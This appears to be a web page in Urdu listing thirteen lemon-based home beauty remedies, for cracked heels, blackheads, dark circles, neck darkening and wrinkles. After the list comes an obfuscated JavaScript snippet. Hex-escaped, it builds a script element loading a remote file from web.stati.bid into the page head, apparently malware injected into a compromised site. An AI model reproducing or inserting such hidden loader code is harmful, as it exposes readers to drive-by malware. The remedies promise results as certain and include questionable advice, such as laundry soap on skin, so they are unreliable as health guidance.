پھٹی ہوئی ایڑیاں۔۔۔۔
ایک لیموں کا چھلکا پیس لیں اس میں ایک چائے کاچمچ گلیسرین ،ایک چمچ عرق گلاب اور ایک انچ لمباو چوڑا کپڑے دھونے کے صابن کا ٹکڑا ملا کرکریم تیار کر لیں،رات سونے سے قبل پھٹی ہوئی ایڑیوں پر لگا کر صبح پیر دھو لیں ۔چند دنوں میں پھٹی ہوئی ایڑیاں درست ہو جائیں گی۔
2-بالوں کی چمک۔۔۔۔
روکھے بالوں میں چمک پیدا کرنے کے لیے سر دھونے کے بعد ایک مگ پانی میں ایک لیموں کا رس ملانے سے بالوں میں چمک آجاتی ہے۔
3-ناک سے سیاہ کیلوں کا خاتمہ۔۔۔۔
ناک پر اچھی سی کولڈکریم سےمساج کرنے کے بعد ململ کے کپڑے سے کریم اتار لیں ۔اب لیموں کے رس دار چھلکے کو ناک پر رگڑیں اور کیلوں کو ہاتھ سے دبا کر نکال دیں۔
4-پیروں پر سیاہ نشانات۔۔۔۔
پیر دھونے کے بعد ایک لیموں کو دو ٹکڑوں میں تقسیم کر لیں اور جو کا آٹا لگا کر پیروں کا مساج کریں کہ لیموں کا رس پاؤں میں جذب ہو جائے۔پانچ منٹ بعد پاؤں دھو کر پٹرولیم جیلی لگا لیں ۔
5-چہرے کے نشانات۔۔۔۔
گرمی کے موسم میں دھوپ سے چہرے پر نشان پڑ جاتے ہیں ،اس کے لیے ایک لیموں کے رس میں ایک چائے کا چمچ شہد ملا کر ماسک تیار کر لیں اور دس منٹ چہرے پر لگا رہنے دیں اور پھر چہرہ دھو لیں ۔نشانات آہستہ آہستہ ختم ہونے لگیں گے۔
6-چکنی جلد کی صفائی۔۔۔۔
چکنی جلد کے لیے ایک لیموں کے رس میں ایک کھانے کا چمچ بیسن اور دو چائے کے چمچ عرق گلاب ملا کر ماسک تیار کر لیں اور لگانے کے دس منٹ بعد چہرہ دھو لیں۔
7-گردن کی صفائی۔۔۔۔
ایک لیموں کا چھلکا تقریباًآدھا کپ پانی میں ابال کر ٹھنڈا کر لیں اب اس پانی میں چار کھانے کے چمچ بیسن یا اتنی ہی مقدار میں جو کا آٹا اور ایک چٹکی ہلدی ملا کر پیسٹ بنا لیں ،اس سے گردن کا مساج کریں اور پانی سے دھونے کے بعد کسی کریم میں چند قطرے عرق گلاب ملا کر لگا لیں ۔یہ مساج ہفتہ وار کریں ،اس سے گردن کی سیاہی دور ہوتی ہے۔
8-ناخن کی چمک۔۔۔۔
لیموں کے رس دار چھلکے سے جس میں نمی موجود ہو ناخن کا مساج کریں،ناخن صاف اور چمکدار ہو جائیں گے۔
9-سیاہ ہونٹ۔۔۔۔
ایک کھانے کا چمچ دودھ کی بالائی میں لیموں کے چند قطرے اور عرق گلاب کے چند قطرے ملا کر ہونٹوں کا مساج کریں ۔اس سے ہونٹ سیاہی مائل نہیں ہوتے ۔
10-کہنی اور گھٹنا۔۔۔۔
کہنیوں اور گھٹنوں کی صفائی کے لیے ایک کھانے کا چمچ سوجی میں ایک عدد لیموں کا عرق اور ایک کھانے کا چمچ دودھ کی بالائی اتار کر کریم بنا لیں اور اس سے کہنیوں اور گھٹنوں کا مساج کریں ،ایسا کرنے سے اس میں موجود میل آسانی سے نکل جاتا ہے۔
11-ملائم جلد کے لیے ۔۔۔۔
ایک چمچ روغن بادام اور آدھے لیموں کا رس ملا کر روزانہ ہاتھوں اور چہرے کامساج کریں ،اس سے جلد نرم وملائم اور صاف رہتی ہے ۔
12-آنکھوں کے سیاہ حلقے ۔۔۔۔
لیموں کے چھلکوں کو پیس لیں اور اس میں روغن بادام یا پٹرولیم جیلی ملا کر آنکھوں کے گرد لگائیں اور چند منٹ مساج کرنے کے بعد ململ کے کپڑے کو عرق گلاب سے بھگو کر چہرہ صاف کر لیں۔
13-جھریاں دور کرنا۔۔۔۔
ایک عدد لیموں کے رس میں ایک کھانے کا چمچ ملتانی مٹی اور ایک چائے کا چمچ دودھ کی بالائی ملا کر ماسک تیار کر لیں اور چہرے پر پانچ منٹ تک لگا رہنے دیں۔بعد میں چہرہ دھو لیں اور کوئی اچھی سی کریم لگا لیں۔

var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Facebook Comments

Comments are closed.